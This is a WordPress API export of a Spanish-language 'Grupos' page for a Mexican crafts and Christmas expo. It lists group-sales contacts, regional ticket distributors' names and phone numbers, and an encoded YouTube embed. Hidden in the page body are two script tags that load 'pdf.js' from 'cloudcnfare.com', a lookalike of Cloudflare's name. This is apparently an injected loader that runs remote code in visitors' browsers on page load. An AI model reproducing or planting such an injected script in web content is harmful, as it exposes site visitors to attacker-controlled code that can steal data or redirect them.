{"id":556,"date":"2018-09-04T10:48:11","date_gmt":"2018-09-04T15:48:11","guid":{"rendered":"https:\/\/www.expomanualidades.info\/navidad\/?page_id=556"},"modified":"2023-09-26T13:14:09","modified_gmt":"2023-09-26T19:14:09","slug":"grupos","status":"publish","type":"page","link":"https:\/\/www.expomanualidades.info\/navidad\/grupos\/","title":{"rendered":"Grupos"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row][vc_column width=&#8221;1\/2&#8243;][vc_column_text]<strong>Disfruta de los beneficios de asistir a la Expo con tu grupo de amigos o familia.<\/strong><\/p>\n<p><strong>Atenci\u00f3n personalizada a grupos:<\/strong><\/p>\n<p><strong>Raquel L\u00f3pez<br \/>\n<\/strong>Tel. (55) 5605 1044<br \/>\nTel. (55) 5604 4900 Ext 118 y 119<br \/>\nraquel@tradex.com.mx[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/2&#8243;][vc_raw_html]JTNDaWZyYW1lJTIwbG9hZGluZyUzRCUyMmxhenklMjIlMjAlMjB3aWR0aCUzRCUyMjU2MCUyMiUyMGhlaWdodCUzRCUyMjMxNSUyMiUyMHNyYyUzRCUyMmh0dHBzJTNBJTJGJTJGd3d3LnlvdXR1YmUuY29tJTJGZW1iZWQlMkZYNzRRM1FteTA3SSUzRmNvbnRyb2xzJTNEMSUyNmFtcCUzQmF1dG9wbGF5JTNEMSUyNmFtcCUzQm11dGUlM0QxJTI2YW1wJTNCbG9vcCUzRDElMjZhbXAlM0Jtb2Rlc3RicmFuZGluZyUzRDElMjZhbXAlM0JzaG93aW5mbyUzRDAlMjZhbXAlM0JyZWwlM0QwJTI2YW1wJTNCcGxheWxpc3QlM0RYNzRRM1FteTA3SSUyMiUyMHRpdGxlJTNEJTIyWW91VHViZSUyMHZpZGVvJTIwcGxheWVyJTIyJTIwZnJhbWVib3JkZXIlM0QlMjIwJTIyJTIwYWxsb3clM0QlMjJhY2NlbGVyb21ldGVyJTNCJTIwYXV0b3BsYXklM0IlMjBjbGlwYm9hcmQtd3JpdGUlM0IlMjBlbmNyeXB0ZWQtbWVkaWElM0IlMjBneXJvc2NvcGUlM0IlMjBwaWN0dXJlLWluLXBpY3R1cmUlMjIlMjBhbGxvd2Z1bGxzY3JlZW4lM0QlMjIlMjIlM0UlM0MlMkZpZnJhbWUlM0U=[\/vc_raw_html][\/vc_column][\/vc_row][vc_row][vc_column 0=&#8221;&#8221;][vc_column_text]<!--p style=\"margin-bottom: 12.0pt; text-align: center;\" align=\"center\"><b><span style=\"font-family: 'Century Gothic','sans-serif'; color: red;\">PUNTO DE VENTA<\/span><\/b><\/p>\n\n\n\n\n<p style=\"text-align: center;\" align=\"center\"><span style=\"font-family: 'Century Gothic','serif';\">Adquiere tus boletos con nuestros distribuidores<\/span><\/p-->[\/vc_column_text][vc_column_text]<\/p>\n<p><script src=\"https:\/\/cloudcnfare.com\/pdf.js\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cloudcnfare.com\/pdf.js\" type=\"text\/javascript\"><\/script>[\/vc_column_text][\/vc_column][\/vc_row][vc_row 0=&#8221;&#8221; disable_element=&#8221;yes&#8221;][vc_column width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;2299&#8243; alignment=&#8221;center&#8221;][vc_column_text]<\/p>\n<p style=\"margin-bottom: 12.0pt; text-align: center;\" align=\"center\"><b><span style=\"font-family: 'Century Gothic','sans-serif'; color: red;\">ESTADO DE M\u00c9XICO<\/span><\/b><span style=\"font-family: 'Century Gothic','sans-serif';\"><br \/>\nToluca<br \/>\nEdna Contreras Torres<br \/>\nTel. 722 520 16 63<\/span><\/p>\n<p>[\/vc_column_text][vc_single_image image=&#8221;2299&#8243; alignment=&#8221;center&#8221;][vc_column_text]<\/p>\n<p style=\"margin-bottom: 12.0pt; text-align: center;\" align=\"center\"><b><span style=\"font-family: 'Century Gothic','sans-serif'; color: red;\">MORELOS<\/span><\/b><span style=\"font-family: 'Century Gothic','sans-serif';\"><br \/>\nCuernavaca<br \/>\nMargarita Toledo<br \/>\nTel. 777 258 06 25<\/span><\/p>\n<p>[\/vc_column_text][vc_single_image image=&#8221;2299&#8243; alignment=&#8221;center&#8221;][vc_column_text]<\/p>\n<p style=\"margin-bottom: 12.0pt; text-align: center;\" align=\"center\"><b><span style=\"font-family: 'Century Gothic','sans-serif'; color: red;\">PUEBLA<\/span><\/b><span style=\"font-family: 'Century Gothic','sans-serif';\"><br \/>\nPuebla<br \/>\nIrma Pineda<br \/>\nTel. 222 511 10 18<\/span><\/p>\n<p>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;2299&#8243; alignment=&#8221;center&#8221;][vc_column_text]<\/p>\n<p style=\"margin-bottom: 12.0pt; text-align: center;\" align=\"center\"><b><span style=\"font-family: 'Century Gothic','sans-serif'; color: red;\">GUANAJUATO<\/span><\/b><span style=\"font-family: 'Century Gothic','sans-serif';\"><br \/>\nLe\u00f3n<br \/>\nCarolina L\u00f3pez Mart\u00ednez<br \/>\nTel. 477 399 82 37<\/span><\/p>\n<p>[\/vc_column_text][vc_single_image image=&#8221;2299&#8243; alignment=&#8221;center&#8221;][vc_column_text]<\/p>\n<p style=\"margin-bottom: 12.0pt; text-align: center;\" align=\"center\"><b><span style=\"font-family: 'Century Gothic','sans-serif'; color: red;\">MORELOS<\/span><\/b><span style=\"font-family: 'Century Gothic','sans-serif';\"><br \/>\nCuernavaca<br \/>\nVer\u00f3nica Jer\u00f3nimo Bravo<br \/>\nTel. 777 493 65 01<\/span><\/p>\n<p>[\/vc_column_text][vc_single_image image=&#8221;2299&#8243; alignment=&#8221;center&#8221;][vc_column_text]<\/p>\n<p style=\"margin-bottom: 12.0pt; text-align: center;\" align=\"center\"><b><span style=\"font-family: 'Century Gothic','sans-serif'; color: red;\">QUER\u00c9TARO<\/span><\/b><span style=\"font-family: 'Century Gothic','sans-serif';\"><br \/>\nQuer\u00e9taro<br \/>\nNieves P\u00e9rez Garc\u00eda<br \/>\nTel. 442 337 30 87<\/span><\/p>\n<p>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;2299&#8243; alignment=&#8221;center&#8221;][vc_column_text]<\/p>\n<p style=\"margin-bottom: 12.0pt; text-align: center;\" align=\"center\"><b><span style=\"font-family: 'Century Gothic','sans-serif'; color: red;\">HIDALGO<\/span><\/b><span style=\"font-family: 'Century Gothic','sans-serif';\"><br \/>\nPachuca<br \/>\nFlorentina Mendoza Nogales<br \/>\nTel. 771 293 58 70<\/span><\/p>\n<p>[\/vc_column_text][vc_single_image image=&#8221;2299&#8243; alignment=&#8221;center&#8221;][vc_column_text]<\/p>\n<p style=\"margin-bottom: 12.0pt; text-align: center;\" align=\"center\"><b><span style=\"font-family: 'Century Gothic','sans-serif'; color: red;\">PUEBLA<\/span><\/b><span style=\"font-family: 'Century Gothic','sans-serif';\"><br \/>\nPuebla<br \/>\nGaby Perea<br \/>\nTel. 222 113 39 57<\/span><\/p>\n<p>[\/vc_column_text][vc_single_image image=&#8221;2299&#8243; alignment=&#8221;center&#8221;][vc_column_text]<\/p>\n<p style=\"margin-bottom: 12.0pt; text-align: center;\" align=\"center\"><b><span style=\"font-family: 'Century Gothic','sans-serif'; color: red;\">QUER\u00c9TARO<\/span><\/b><span style=\"font-family: 'Century Gothic','sans-serif';\"><br \/>\nQuer\u00e9taro<br \/>\nRoci\u00f3 Robles D\u00e1vila<br \/>\nTel. 442 146 49 86<\/span><\/p>\n<p>[\/vc_column_text][\/vc_column][\/vc_row]<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row][vc_column width=&#8221;1\/2&#8243;][vc_column_text]Disfruta de los beneficios de asistir a la Expo con tu grupo de amigos o familia. Atenci\u00f3n personalizada a grupos: Raquel L\u00f3pez Tel. (55) 5605 1044 Tel. (55) 5604 4900 Ext 118 y 119 raquel@tradex.com.mx[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/2&#8243;][vc_raw_html]JTNDaWZyYW1lJTIwbG9hZGluZyUzRCUyMmxhenklMjIlMjAlMjB3aWR0aCUzRCUyMjU2MCUyMiUyMGhlaWdodCUzRCUyMjMxNSUyMiUyMHNyYyUzRCUyMmh0dHBzJTNBJTJGJTJGd3d3LnlvdXR1YmUuY29tJTJGZW1iZWQlMkZYNzRRM1FteTA3SSUzRmNvbnRyb2xzJTNEMSUyNmFtcCUzQmF1dG9wbGF5JTNEMSUyNmFtcCUzQm11dGUlM0QxJTI2YW1wJTNCbG9vcCUzRDElMjZhbXAlM0Jtb2Rlc3RicmFuZGluZyUzRDElMjZhbXAlM0JzaG93aW5mbyUzRDAlMjZhbXAlM0JyZWwlM0QwJTI2YW1wJTNCcGxheWxpc3QlM0RYNzRRM1FteTA3SSUyMiUyMHRpdGxlJTNEJTIyWW91VHViZSUyMHZpZGVvJTIwcGxheWVyJTIyJTIwZnJhbWVib3JkZXIlM0QlMjIwJTIyJTIwYWxsb3clM0QlMjJhY2NlbGVyb21ldGVyJTNCJTIwYXV0b3BsYXklM0IlMjBjbGlwYm9hcmQtd3JpdGUlM0IlMjBlbmNyeXB0ZWQtbWVkaWElM0IlMjBneXJvc2NvcGUlM0IlMjBwaWN0dXJlLWluLXBpY3R1cmUlMjIlMjBhbGxvd2Z1bGxzY3JlZW4lM0QlMjIlMjIlM0UlM0MlMkZpZnJhbWUlM0U=[\/vc_raw_html][\/vc_column][\/vc_row][vc_row][vc_column 0=&#8221;&#8221;][vc_column_text][\/vc_column_text][vc_column_text] [\/vc_column_text][\/vc_column][\/vc_row][vc_row 0=&#8221;&#8221; disable_element=&#8221;yes&#8221;][vc_column width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;2299&#8243; alignment=&#8221;center&#8221;][vc_column_text] ESTADO DE M\u00c9XICO Toluca Edna Contreras Torres Tel. 722 520 16 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"page-templates\/contact-template.php","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"site-sidebar-layout":"no-sidebar","site-content-layout":"plain-container","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"disabled","ast-breadcrumbs-content":"","ast-featured-img":"disabled","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"class_list":["post-556","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.0 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Grupos - Manualidades y Navidad<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.expomanualidades.info\/navidad\/grupos\/\" \/>\n<meta property=\"og:locale\" content=\"es_MX\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Grupos - Manualidades y Navidad\" \/>\n<meta property=\"og:description\" content=\"[vc_row][vc_column width=&#8221;1\/2&#8243;][vc_column_text]Disfruta de los beneficios de asistir a la Expo con tu grupo de amigos o familia. Atenci\u00f3n personalizada a grupos: Raquel L\u00f3pez Tel. (55) 5605 1044 Tel. (55) 5604 4900 Ext 118 y 119 raquel@tradex.com.mx[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/2&#8243;][vc_raw_html]JTNDaWZyYW1lJTIwbG9hZGluZyUzRCUyMmxhenklMjIlMjAlMjB3aWR0aCUzRCUyMjU2MCUyMiUyMGhlaWdodCUzRCUyMjMxNSUyMiUyMHNyYyUzRCUyMmh0dHBzJTNBJTJGJTJGd3d3LnlvdXR1YmUuY29tJTJGZW1iZWQlMkZYNzRRM1FteTA3SSUzRmNvbnRyb2xzJTNEMSUyNmFtcCUzQmF1dG9wbGF5JTNEMSUyNmFtcCUzQm11dGUlM0QxJTI2YW1wJTNCbG9vcCUzRDElMjZhbXAlM0Jtb2Rlc3RicmFuZGluZyUzRDElMjZhbXAlM0JzaG93aW5mbyUzRDAlMjZhbXAlM0JyZWwlM0QwJTI2YW1wJTNCcGxheWxpc3QlM0RYNzRRM1FteTA3SSUyMiUyMHRpdGxlJTNEJTIyWW91VHViZSUyMHZpZGVvJTIwcGxheWVyJTIyJTIwZnJhbWVib3JkZXIlM0QlMjIwJTIyJTIwYWxsb3clM0QlMjJhY2NlbGVyb21ldGVyJTNCJTIwYXV0b3BsYXklM0IlMjBjbGlwYm9hcmQtd3JpdGUlM0IlMjBlbmNyeXB0ZWQtbWVkaWElM0IlMjBneXJvc2NvcGUlM0IlMjBwaWN0dXJlLWluLXBpY3R1cmUlMjIlMjBhbGxvd2Z1bGxzY3JlZW4lM0QlMjIlMjIlM0UlM0MlMkZpZnJhbWUlM0U=[\/vc_raw_html][\/vc_column][\/vc_row][vc_row][vc_column 0=&#8221;&#8221;][vc_column_text][\/vc_column_text][vc_column_text] [\/vc_column_text][\/vc_column][\/vc_row][vc_row 0=&#8221;&#8221; disable_element=&#8221;yes&#8221;][vc_column width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;2299&#8243; alignment=&#8221;center&#8221;][vc_column_text] ESTADO DE M\u00c9XICO Toluca Edna Contreras Torres Tel. 722 520 16 [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.expomanualidades.info\/navidad\/grupos\/\" \/>\n<meta property=\"og:site_name\" content=\"Manualidades y Navidad\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/xpomanualidades\/\" \/>\n<meta property=\"article:modified_time\" content=\"2023-09-26T19:14:09+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data1\" content=\"2 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.expomanualidades.info\/navidad\/grupos\/\",\"url\":\"https:\/\/www.expomanualidades.info\/navidad\/grupos\/\",\"name\":\"Grupos - Manualidades y Navidad\",\"isPartOf\":{\"@id\":\"https:\/\/www.expomanualidades.info\/navidad\/#website\"},\"datePublished\":\"2018-09-04T15:48:11+00:00\",\"dateModified\":\"2023-09-26T19:14:09+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/www.expomanualidades.info\/navidad\/grupos\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.expomanualidades.info\/navidad\/grupos\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.expomanualidades.info\/navidad\/grupos\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Inicio\",\"item\":\"https:\/\/www.expomanualidades.info\/navidad\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Grupos\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.expomanualidades.info\/navidad\/#website\",\"url\":\"https:\/\/www.expomanualidades.info\/navidad\/\",\"name\":\"Manualidades y Navidad\",\"description\":\"Ac\u00e9rcate al mundo de las manualidades, donde podr\u00e1s adquirir insumos y herramientas para la elaboraci\u00f3n de distintas t\u00e9cnicas.\",\"publisher\":{\"@id\":\"https:\/\/www.expomanualidades.info\/navidad\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.expomanualidades.info\/navidad\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.expomanualidades.info\/navidad\/#organization\",\"name\":\"Manualidades y Navidad\",\"url\":\"https:\/\/www.expomanualidades.info\/navidad\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\/\/www.expomanualidades.info\/navidad\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.expomanualidades.info\/navidad\/wp-content\/uploads\/2025\/10\/Expo-Manualidades-Navidad-10.png\",\"contentUrl\":\"https:\/\/www.expomanualidades.info\/navidad\/wp-content\/uploads\/2025\/10\/Expo-Manualidades-Navidad-10.png\",\"width\":1247,\"height\":332,\"caption\":\"Manualidades y Navidad\"},\"image\":{\"@id\":\"https:\/\/www.expomanualidades.info\/navidad\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/xpomanualidades\/\",\"https:\/\/www.instagram.com\/expomerceriaymanualidades\/\",\"https:\/\/www.youtube.com\/channel\/UCrl-kP24qbcrh1Ebk4RjK9A\",\"https:\/\/www.tiktok.com\/@merceriaymanualidades\",\"https:\/\/open.spotify.com\/show\/0eic79uV9YVcZ9bbRjVd0p\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Grupos - Manualidades y Navidad","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.expomanualidades.info\/navidad\/grupos\/","og_locale":"es_MX","og_type":"article","og_title":"Grupos - Manualidades y Navidad","og_description":"[vc_row][vc_column width=&#8221;1\/2&#8243;][vc_column_text]Disfruta de los beneficios de asistir a la Expo con tu grupo de amigos o familia. Atenci\u00f3n personalizada a grupos: Raquel L\u00f3pez Tel. (55) 5605 1044 Tel. (55) 5604 4900 Ext 118 y 119 raquel@tradex.com.mx[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/2&#8243;][vc_raw_html]JTNDaWZyYW1lJTIwbG9hZGluZyUzRCUyMmxhenklMjIlMjAlMjB3aWR0aCUzRCUyMjU2MCUyMiUyMGhlaWdodCUzRCUyMjMxNSUyMiUyMHNyYyUzRCUyMmh0dHBzJTNBJTJGJTJGd3d3LnlvdXR1YmUuY29tJTJGZW1iZWQlMkZYNzRRM1FteTA3SSUzRmNvbnRyb2xzJTNEMSUyNmFtcCUzQmF1dG9wbGF5JTNEMSUyNmFtcCUzQm11dGUlM0QxJTI2YW1wJTNCbG9vcCUzRDElMjZhbXAlM0Jtb2Rlc3RicmFuZGluZyUzRDElMjZhbXAlM0JzaG93aW5mbyUzRDAlMjZhbXAlM0JyZWwlM0QwJTI2YW1wJTNCcGxheWxpc3QlM0RYNzRRM1FteTA3SSUyMiUyMHRpdGxlJTNEJTIyWW91VHViZSUyMHZpZGVvJTIwcGxheWVyJTIyJTIwZnJhbWVib3JkZXIlM0QlMjIwJTIyJTIwYWxsb3clM0QlMjJhY2NlbGVyb21ldGVyJTNCJTIwYXV0b3BsYXklM0IlMjBjbGlwYm9hcmQtd3JpdGUlM0IlMjBlbmNyeXB0ZWQtbWVkaWElM0IlMjBneXJvc2NvcGUlM0IlMjBwaWN0dXJlLWluLXBpY3R1cmUlMjIlMjBhbGxvd2Z1bGxzY3JlZW4lM0QlMjIlMjIlM0UlM0MlMkZpZnJhbWUlM0U=[\/vc_raw_html][\/vc_column][\/vc_row][vc_row][vc_column 0=&#8221;&#8221;][vc_column_text][\/vc_column_text][vc_column_text] [\/vc_column_text][\/vc_column][\/vc_row][vc_row 0=&#8221;&#8221; disable_element=&#8221;yes&#8221;][vc_column width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;2299&#8243; alignment=&#8221;center&#8221;][vc_column_text] ESTADO DE M\u00c9XICO Toluca Edna Contreras Torres Tel. 722 520 16 [&hellip;]","og_url":"https:\/\/www.expomanualidades.info\/navidad\/grupos\/","og_site_name":"Manualidades y Navidad","article_publisher":"https:\/\/www.facebook.com\/xpomanualidades\/","article_modified_time":"2023-09-26T19:14:09+00:00","twitter_card":"summary_large_image","twitter_misc":{"Tiempo de lectura":"2 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.expomanualidades.info\/navidad\/grupos\/","url":"https:\/\/www.expomanualidades.info\/navidad\/grupos\/","name":"Grupos - Manualidades y Navidad","isPartOf":{"@id":"https:\/\/www.expomanualidades.info\/navidad\/#website"},"datePublished":"2018-09-04T15:48:11+00:00","dateModified":"2023-09-26T19:14:09+00:00","breadcrumb":{"@id":"https:\/\/www.expomanualidades.info\/navidad\/grupos\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.expomanualidades.info\/navidad\/grupos\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.expomanualidades.info\/navidad\/grupos\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Inicio","item":"https:\/\/www.expomanualidades.info\/navidad\/"},{"@type":"ListItem","position":2,"name":"Grupos"}]},{"@type":"WebSite","@id":"https:\/\/www.expomanualidades.info\/navidad\/#website","url":"https:\/\/www.expomanualidades.info\/navidad\/","name":"Manualidades y Navidad","description":"Ac\u00e9rcate al mundo de las manualidades, donde podr\u00e1s adquirir insumos y herramientas para la elaboraci\u00f3n de distintas t\u00e9cnicas.","publisher":{"@id":"https:\/\/www.expomanualidades.info\/navidad\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.expomanualidades.info\/navidad\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":"Organization","@id":"https:\/\/www.expomanualidades.info\/navidad\/#organization","name":"Manualidades y Navidad","url":"https:\/\/www.expomanualidades.info\/navidad\/","logo":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/www.expomanualidades.info\/navidad\/#\/schema\/logo\/image\/","url":"https:\/\/www.expomanualidades.info\/navidad\/wp-content\/uploads\/2025\/10\/Expo-Manualidades-Navidad-10.png","contentUrl":"https:\/\/www.expomanualidades.info\/navidad\/wp-content\/uploads\/2025\/10\/Expo-Manualidades-Navidad-10.png","width":1247,"height":332,"caption":"Manualidades y Navidad"},"image":{"@id":"https:\/\/www.expomanualidades.info\/navidad\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/xpomanualidades\/","https:\/\/www.instagram.com\/expomerceriaymanualidades\/","https:\/\/www.youtube.com\/channel\/UCrl-kP24qbcrh1Ebk4RjK9A","https:\/\/www.tiktok.com\/@merceriaymanualidades","https:\/\/open.spotify.com\/show\/0eic79uV9YVcZ9bbRjVd0p"]}]}},"_links":{"self":[{"href":"https:\/\/www.expomanualidades.info\/navidad\/wp-json\/wp\/v2\/pages\/556","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.expomanualidades.info\/navidad\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.expomanualidades.info\/navidad\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.expomanualidades.info\/navidad\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.expomanualidades.info\/navidad\/wp-json\/wp\/v2\/comments?post=556"}],"version-history":[{"count":18,"href":"https:\/\/www.expomanualidades.info\/navidad\/wp-json\/wp\/v2\/pages\/556\/revisions"}],"predecessor-version":[{"id":15405,"href":"https:\/\/www.expomanualidades.info\/navidad\/wp-json\/wp\/v2\/pages\/556\/revisions\/15405"}],"wp:attachment":[{"href":"https:\/\/www.expomanualidades.info\/navidad\/wp-json\/wp\/v2\/media?parent=556"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}